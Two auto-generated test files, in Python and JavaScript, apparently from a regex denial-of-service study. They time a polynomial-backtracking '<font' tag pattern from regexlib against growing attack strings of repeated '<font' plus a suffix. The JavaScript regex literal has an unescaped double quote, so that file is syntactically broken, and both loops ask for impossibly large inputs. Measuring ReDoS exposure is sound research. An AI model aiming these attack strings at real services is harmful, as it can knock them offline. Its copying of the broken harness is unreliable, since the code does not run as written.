File: regexlib/python_re_test_file/regexlib_4549.py
# 4549
# <font[a-zA-Z0-9_\^\$\.\|\{\[\}\]\(\)\*\+\?\\~`!@#%&-=;:'",/\n\s]*>
# POLYNOMIAL
# nums:4
# POLYNOMIAL AttackString:""+"<font"*5000+"◎1 _SLQ_2"

import re
from time import perf_counter

regex = """<font[a-zA-Z0-9_\^\$\.\|\{\[\}\]\(\)\*\+\?\\~`!@#%&-=;:'",/\n\s]*>"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "" + "<font" * i * 10000 + "◎1 _SLQ_2"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *10000}: took {DURATION} seconds!")

File: regexlib/javascript_test_file/regexlib_4549.js
/* 4549
 * <font[a-zA-Z0-9_\^\$\.\|\{\[\}\]\(\)\*\+\?\\~`!@#%&-=;:'",/\n\s]*>
 * POLYNOMIAL
 * nums:3
 * POLYNOMIAL AttackString:""+"<font"*5000+"◎1 _SLQ_2"
 */
var REGEX = new RegExp("<font[a-zA-Z0-9_\^\$\.\|\{\[\}\]\(\)\*\+\?\\~`!@#%&-=;:'",/\n\s]*>")
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '' + '<font'.repeat(i*10000) + '◎1 _SLQ_2'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 10000 + ": " + time_cost+" ms")
}